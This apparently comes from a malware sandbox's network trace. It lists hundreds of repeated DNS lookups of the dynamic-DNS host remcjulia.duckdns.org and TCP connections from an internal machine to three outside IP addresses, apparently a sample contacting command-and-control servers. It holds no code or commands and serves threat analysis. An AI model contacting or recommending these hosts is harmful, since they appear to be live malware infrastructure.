Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org
Source: global traffic	DNS query: name: remcjulia.duckdns.org

Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49161 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.210.214.26:80
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49162 -> 104.21.84.67:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 172.67.215.45:443
